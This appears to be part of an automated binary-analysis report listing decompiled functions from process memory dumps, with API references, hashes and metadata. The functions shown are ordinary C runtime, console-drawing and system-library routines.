			E012B1380(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebp;
				intOrPtr _t61;
				intOrPtr _t67;
				void* _t75;
				intOrPtr _t87;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t102 = __esi;
				_t101 = __edi;
				E012B12B0(_a4, _a8);
				_push(0xc9);
				_push("%c");
				E012B715C(_t75, __edi, __esi, __eflags);
				_t104 = _t103 + 8;
				_v8 = _a4 + 1;
				while(1) {
					_t109 = _v8 - _a12 - 1;
					if(_v8 >= _a12 - 1) {
						break;
					}
					E012B12B0(_v8, _a8);
					_push(0xcd);
					_push("%c");
					E012B715C(_t75, _t101, _t102, _t109);
					_t104 = _t104 + 8;
					_v8 = _v8 + 1;
				}
				E012B12B0(_v8, _a8);
				_push(0xbb);
				_push("%c");
				E012B715C(_t75, _t101, _t102, __eflags);
				_t105 = _t104 + 8;
				_v12 = _a8 + 1;
				while(1) {
					__eflags = _v12 - _a16;
					if(__eflags >= 0) {
						break;
					}
					E012B12B0(_a4, _v12);
					_v8 = _a4;
					while(1) {
						__eflags = _v8 - _a12;
						if(_v8 >= _a12) {
							break;
						}
						__eflags = _v8 - _a4;
						if(__eflags == 0) {
							L12:
							E012B12B0(_v8, _v12);
							_push(0xba);
							_push("%c");
							E012B715C(_t75, _t101, _t102, __eflags);
							_t105 = _t105 + 8;
						} else {
							__eflags = _v8 - _a12 - 1;
							if(__eflags == 0) {
								goto L12;
							}
						}
						_t67 = _v8 + 1;
						__eflags = _t67;
						_v8 = _t67;
					}
					_t87 = _v12 + 1;
					__eflags = _t87;
					_v12 = _t87;
				}
				E012B12B0(_a4, _v12);
				_push(0xc8);
				_push("%c");
				E012B715C(_t75, _t101, _t102, __eflags);
				_t106 = _t105 + 8;
				_v8 = _a4 + 1;
				while(1) {
					__eflags = _v8 - _a12 - 1;
					if(__eflags >= 0) {
						break;
					}
					E012B12B0(_v8, _v12);
					_push(0xcd);
					_push("%c");
					E012B715C(_t75, _t101, _t102, __eflags);
					_t106 = _t106 + 8;
					_t61 = _v8 + 1;
					__eflags = _t61;
					_v8 = _t61;
				}
				E012B12B0(_v8, _v12);
				_push(0xbc);
				_push("%c");
				return E012B715C(_t75, _t101, _t102, __eflags);
			}

APIs

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B139D
_wprintf.LIBCMT ref: 012B13DB

Part of subcall function 012B715C: __stbuf.LIBCMT ref: 012B71A8
Part of subcall function 012B715C: __output_s_l.LIBCMT ref: 012B71C2
Part of subcall function 012B715C: __ftbuf.LIBCMT ref: 012B71D6

_wprintf.LIBCMT ref: 012B13FC
_wprintf.LIBCMT ref: 012B1470
_wprintf.LIBCMT ref: 012B1493
_wprintf.LIBCMT ref: 012B14D1
_wprintf.LIBCMT ref: 012B14F2

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
String ID:
API String ID: 1778593935-0
Opcode ID: f5253ed91d8be3c5b56e58562d060cff028d119f2f5c526ade907002e9fd1189
Instruction ID: 217e91e0c51ee16fc66b5dcb371fb1b24faa5bbb7e3674281ffc99d11aa19cbd
Opcode Fuzzy Hash: f5253ed91d8be3c5b56e58562d060cff028d119f2f5c526ade907002e9fd1189
Instruction Fuzzy Hash: 2D417671A3020AFBCB04DF94DDD1EEE7776EF55780F108258E905A7380D670AB6097A5

Uniqueness

Uniqueness Score: -1.00%

Function 012BD6D2, Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E012BD6D2(void* __ebx, void* __edi) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E012B75FE(_t3);
				if(E012BBF8E() != 0) {
					_t6 = E012BBFD8(_t5, E012BD468);
					 *0x12d1a40 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E012BC55B(1, 0x3b8);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E012BD748();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E012BC002(_t9,  *0x12d1a40, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E012BD626(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E012BD748();
					return 0;
				}
			}

APIs

__init_pointers.LIBCMT ref: 012BD6D2

Part of subcall function 012B75FE: EncodePointer.KERNEL32(00000000,?,012BD6D7,012B892B,012CD838,00000014), ref: 012B7601
Part of subcall function 012B75FE: __initp_misc_winsig.LIBCMT ref: 012B7622

__mtinitlocks.LIBCMT ref: 012BD6D7

Part of subcall function 012BBF8E: InitializeCriticalSectionAndSpinCount.KERNEL32(012D13D0,00000FA0,?,?,012BD6DC,012B892B,012CD838,00000014), ref: 012BBFAC

__mtterm.LIBCMT ref: 012BD6E0
__calloc_crt.LIBCMT ref: 012BD705
__initptd.LIBCMT ref: 012BD727
GetCurrentThreadId.KERNEL32(012B892B,012CD838,00000014), ref: 012BD72E

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
String ID:
API String ID: 2211675822-0
Opcode ID: c47d874e8cbb53c0c391106f6eab62ffcb736fb0b4d77f4424f7643c3d82f22f
Instruction ID: a0edefe9c0cc84a9f48640ffdd94f976e658a0323b89934c5a0ada7588ce2a8e
Opcode Fuzzy Hash: c47d874e8cbb53c0c391106f6eab62ffcb736fb0b4d77f4424f7643c3d82f22f
Instruction Fuzzy Hash: 53F0F63257A3671FE63836FCBC867E636D4CF613F4B204619F555C60C4EF2090419694

Uniqueness

Uniqueness Score: -1.00%

Function 012BBB6C, Relevance: 9.1, APIs: 6, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E012BBB6C(void* __eflags, signed char _a4, signed int* _a8) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t43;
				signed int _t44;
				signed int _t45;
				signed int _t48;
				signed int _t52;
				void* _t60;
				signed int _t62;
				void* _t64;
				signed int _t67;
				signed int _t70;
				signed int _t74;
				signed int _t76;
				void* _t77;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t89;
				signed int* _t92;

				_t44 = E012BA5A7(_t43);
				if(_t44 >= 0) {
					_t92 = _a8;
					_t45 = E012B8BB2(_t92);
					_t74 = _t92[3];
					_t89 = _t45;
					__eflags = _t74 & 0x00000082;
					if(__eflags != 0) {
						__eflags = _t74 & 0x00000040;
						if(__eflags == 0) {
							_t70 = 0;
							__eflags = _t74 & 0x00000001;
							if((_t74 & 0x00000001) == 0) {
								L10:
								_t48 = _t92[3] & 0xffffffef | 0x00000002;
								_t92[3] = _t48;
								_t92[1] = _t70;
								__eflags = _t48 & 0x0000010c;
								if((_t48 & 0x0000010c) == 0) {
									_t60 = E012B8C70();
									__eflags = _t92 - _t60 + 0x20;
									if(_t92 == _t60 + 0x20) {
										L13:
										_t62 = E012C11E7(_t89);
										__eflags = _t62;
										if(_t62 == 0) {
											goto L14;
										}
									} else {
										_t64 = E012B8C70();
										__eflags = _t92 - _t64 + 0x40;
										if(_t92 != _t64 + 0x40) {
											L14:
											E012C192E(_t92);
										} else {
											goto L13;
										}
									}
								}
								__eflags = _t92[3] & 0x00000108;
								if((_t92[3] & 0x00000108) == 0) {
									__eflags = 1;
									_push(1);
									_v8 = 1;
									_push( &_a4);
									_push(_t89);
									_t45 = E012C0343(_t70, _t86, _t89, _t92, 1);
									_t70 = _t45;
									goto L27;
								} else {
									_t87 = _t92[2];
									_t25 = _t87 + 1; // 0x1a06
									 *_t92 = _t25;
									_t76 =  *_t92 - _t87;
									_v8 = _t76;
									_t92[1] = _t92[6] - 1;
									__eflags = _t76;
									if(__eflags <= 0) {
										__eflags = _t89 - 0xffffffff;
										if(_t89 == 0xffffffff) {
											L22:
											_t77 = 0x12d1390;
										} else {
											__eflags = _t89 - 0xfffffffe;
											if(_t89 == 0xfffffffe) {
												goto L22;
											} else {
												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x12d2f60 + (_t89 >> 5) * 4));
											}
										}
										__eflags =  *(_t77 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t70);
											_push(_t70);
											_push(_t89);
											_t45 = E012C17B4(_t70, _t89, _t92, __eflags) & _t87;
											__eflags = _t45 - 0xffffffff;
											if(_t45 == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t76);
										_push(_t87);
										_push(_t89);
										_t70 = E012C0343(_t70, _t87, _t89, _t92, __eflags);
										L25:
										_t45 = _a4;
										 *(_t92[2]) = _t45;
										L27:
										__eflags = _t70 - _v8;
										if(_t70 == _v8) {
											_t52 = _a4 & 0x000000ff;
										} else {
											L28:
											_t40 =  &(_t92[3]);
											 *_t40 = _t92[3] | 0x00000020;
											__eflags =  *_t40;
											goto L29;
										}
									}
								}
							} else {
								_t92[1] = 0;
								__eflags = _t74 & 0x00000010;
								if((_t74 & 0x00000010) == 0) {
									_t92[3] = _t74 | 0x00000020;
									L29:
									_t52 = _t45 | 0xffffffff;
								} else {
									_t85 = _t74 & 0xfffffffe;
									__eflags = _t85;
									 *_t92 = _t92[2];
									_t92[3] = _t85;
									goto L10;
								}
							}
						} else {
							_t67 = E012B8EFF(__eflags);
							 *_t67 = 0x22;
							goto L6;
						}
					} else {
						_t67 = E012B8EFF(__eflags);
						 *_t67 = 9;
						L6:
						_t92[3] = _t92[3] | 0x00000020;
						_t52 = _t67 | 0xffffffff;
					}
					return _t52;
				} else {
					return _t44 | 0xffffffff;
				}
			}

APIs

__ioinit.LIBCMT ref: 012BBB70

Part of subcall function 012BA5A7: InitOnceExecuteOnce.KERNEL32(012D229C,012BA5E2,00000000,00000000), ref: 012BA5B5

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: Once$ExecuteInit__ioinit
String ID:
API String ID: 129814473-0
Opcode ID: 201f70f30c79320a5f75cfef8394b70177cba330fb7754fac0c4719799dddc18
Instruction ID: 3d6cb0972e02690d3837aaed652ce65ad8eb84f398c29d231d6055ffb9efecf0
Opcode Fuzzy Hash: 201f70f30c79320a5f75cfef8394b70177cba330fb7754fac0c4719799dddc18
Instruction Fuzzy Hash: 7A410371520A069FE734DF2CC8D1ABA7BA4DF453A0B04871DE6AA876D1EB74D4408B50

Uniqueness

Uniqueness Score: -1.00%

Function 009514C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E009514C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x9f2088; // 0x775b4c11
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00947707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E009513CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00947707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00947707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00912340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0091E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x009514c0
0x009514cb
0x009514d2
0x009514d6
0x009514da
0x009514de
0x009514e3
0x0095157a
0x0095157a
0x009514f1
0x009514f3
0x0097ea0f
0x00000000
0x0097ea15
0x00000000
0x0097ea15
0x009514f9
0x009514f9
0x009514fe
0x00951504
0x0097ea1a
0x0097ea1f
0x0097ea21
0x0097ea22
0x0097ea27
0x0097ea2a
0x0097ea2a
0x00951515
0x00951517
0x0095156d
0x00951572
0x00951575
0x00951575
0x0095151e
0x0097ea50
0x0097ea55
0x0097ea58
0x0097ea58
0x0095152e
0x00951531
0x00951533
0x00000000
0x00951535
0x00951541
0x00951549
0x00951549
0x00951533
0x009514f3
0x00951559

APIs

___swprintf_l.LIBCMT ref: 0097EA22

Part of subcall function 009513CB: ___swprintf_l.LIBCMT ref: 0095146B
Part of subcall function 009513CB: ___swprintf_l.LIBCMT ref: 00951490

___swprintf_l.LIBCMT ref: 0095156D

Strings

]:%u, xrefs: 0097EA47
%%%u, xrefs: 00951564

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: e49b4aa9e17330fc0bba32bbe3b8ec0e9566f3149d02a51b74ae9deae335e553
Instruction ID: 89db2ac7ae0434728841614becbdb4821c7fbb1c5351cb5bb8c3ac0fca1ce611
Opcode Fuzzy Hash: e49b4aa9e17330fc0bba32bbe3b8ec0e9566f3149d02a51b74ae9deae335e553
Instruction Fuzzy Hash: 0F21C172A00219ABCF21DF59CC41BEEB3BCAB94705F844451FC46D3140EB74AA998BE1

Uniqueness

Uniqueness Score: -1.00%

Function 012C1D26, Relevance: 7.6, APIs: 5, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E012C1D26(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x12d2a68, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x12d2a64 - _t7;
								if(__eflags == 0) {
									_t9 = E012B8EFF(__eflags);
									 *_t9 = E012B8F12(GetLastError());
									goto L17;
								} else {
									__eflags = E012BC6EE(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E012B8EFF(__eflags);
										 *_t12 = E012B8F12(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E012BC6EE(_t6, _t31);
						 *((intOrPtr*)(E012B8EFF(__eflags))) = 0xc;
						goto L12;
					} else {
						E012B8F53(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E012B77C5(__ebx, __edx, __edi, _a8);
				}
			}

APIs

_malloc.LIBCMT ref: 012C1D32

Part of subcall function 012B77C5: __FF_MSGBANNER.LIBCMT ref: 012B77DC
Part of subcall function 012B77C5: __NMSG_WRITE.LIBCMT ref: 012B77E3
Part of subcall function 012B77C5: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,012BC5BB,00000000,00000000,00000000,00000000,?,012BBF28,00000018,012CD900), ref: 012B7808

_free.LIBCMT ref: 012C1D45

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.2137470825.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137483810.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.2137488734.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.2137493469.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: 067753a6b97b4ac01a301ff6cdea976d1cb7da3884bd3a498502304c6d71871b
Instruction ID: 92a1a733ebc5435c1fe3500c60e08144bd9803363ffaef3c8de704a591a13ec8
Opcode Fuzzy Hash: 067753a6b97b4ac01a301ff6cdea976d1cb7da3884bd3a498502304c6d71871b
Instruction Fuzzy Hash: A311E332524613EFDB313F78A8456F93B99AF10BA0F108629FB0D8A196DF3084A08790

Uniqueness

Uniqueness Score: -1.00%

Function 009353A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E009353A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009f01c0;
									_push(_t92);
									_push(0);
									_t37 = E0090F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00954FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00963F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00963F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0099217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00963F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00953915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00935384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0090F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00953915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0090F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00953915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0090F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00953915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00935329(_t74, _t92);
													_push(1);
													_t48 = E009353A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}

0x009353ab
0x009353ae
0x009353b1
0x009353b4
0x009353b7
0x009505b6
0x009505c0
0x009505c3
0x00000000
0x009505c9
0x009505c9
0x009505cc
0x009505d5
0x009505d5
0x009353bd
0x009353bd
0x009353bd
0x009353be
0x009353be
0x009353be
0x009353c0
0x00000000
0x00000000
0x00972269
0x0097226d
0x00972349
0x0097234d
0x00972273
0x00972276
0x00972279
0x0097227e
0x00972283
0x00972287
0x0097228a
0x0097228d
0x0097228f
0x009722bc
0x009722bc
0x009722bc
0x009722be
0x009722c4
0x009722cc
0x009722d0
0x009722d6
0x009722d7
0x009722da
0x009722df
0x009722e4
0x00000000
0x00000000
0x009722e6
0x009722e9
0x009722f4
0x009722f9
0x009722fa
0x00972305
0x00972314
0x00972319
0x0097231a
0x0097231d
0x00972320
0x00972323
0x00972323
0x00972328
0x0097232d
0x0097232f
0x00972331
0x00972336
0x00972336
0x0097233b
0x0097233d
0x00972350
0x00972351
0x00972356
0x00972359
0x00972359
0x0097235b
0x0097235d
0x00935367
0x0093536b
0x00935372
0x00000000
0x00000000
0x00000000
0x00000000
0x00972363
0x00972363
0x00972369
0x0097236a
0x0097236c
0x00972371
0x00972373
0x00000000
0x00972379
0x00972379
0x0097237a
0x0097237f
0x0097237f
0x00972385
0x00972386
0x00972389
0x0097238e
0x00972390
0x00935378
0x0093537c
0x00972396
0x00972396
0x00972397
0x0097239c
0x009723a2
0x009723a3
0x009723a6
0x009723ab
0x009723ad
0x00000000
0x009723b3
0x009723b3
0x009723b4
0x009723b9
0x009723ba
0x009723ba
0x009723bc
0x009723bf
0x00000000
0x00000000
0x00969153
0x00969158
0x0096915a
0x0096915e
0x00969160
0x00000000
0x00969166
0x00969166
0x00969171
0x00969176
0x00969176
0x00000000
0x00969160
0x009723c6
0x009723cb
0x009723ce
0x009723d7
0x009723d7
0x009723ad
0x00972390
0x00972373
0x0097233f
0x0097233f
0x00000000
0x0097233f
0x00972291
0x00972291
0x00972293
0x00972295
0x0097229a
0x009722a1
0x009722a3
0x009722a7
0x009722a9
0x00000000
0x00000000
0x009722ab
0x009722ad
0x009722af
0x00000000
0x00000000
0x00000000
0x009722af
0x009722b1
0x009722b4
0x009722b4
0x009722b6
0x00000000
0x00000000
0x00000000
0x00000000
0x009722b6
0x0097228f
0x00000000
0x0097226d
0x009353cb
0x009353ce
0x009353d0
0x009353d4
0x009353d6
0x00000000
0x009353d8
0x009353e3
0x009353ea
0x009353ea
0x009353d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009722F4

Strings

RTL: Re-Waiting, xrefs: 00972328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009722FC
RTL: Resource at %p, xrefs: 0097230B

Memory Dump Source

Source File: 00000005.00000002.2137200692.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2137196521.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137267749.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137271554.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137276287.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137279755.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137283176.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2137310567.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: cba879de21a730e7216a3635e829d9ad6142dfab33ae0ba0d0ac33fbc131fe9d
Instruction ID: 8357857640b4f4155905fd00884eb2c2839117ec6aad3d23648b0fec3cd8ac04
Opcode Fuzzy Hash: cba879de21a730e7216a3635e829d9ad6142dfab33ae0ba0d0ac33fbc131fe9d
Instruction Fuzzy Hash: 5B510872700705ABDB15DB29CC81FA6739CEF98764F118229FD18DB281E661ED418B90

Uniqueness

Uniqueness Score: -1.00%

Function 012B857D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 012B860D

Part of subcall function 012BE840: __87except.LIBCMT ref: 012BE87B

Strings

pow, xrefs: 012B85E5, 012B8602

Memory Dump Source

Source File: 00000005.00000002.2137474397.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

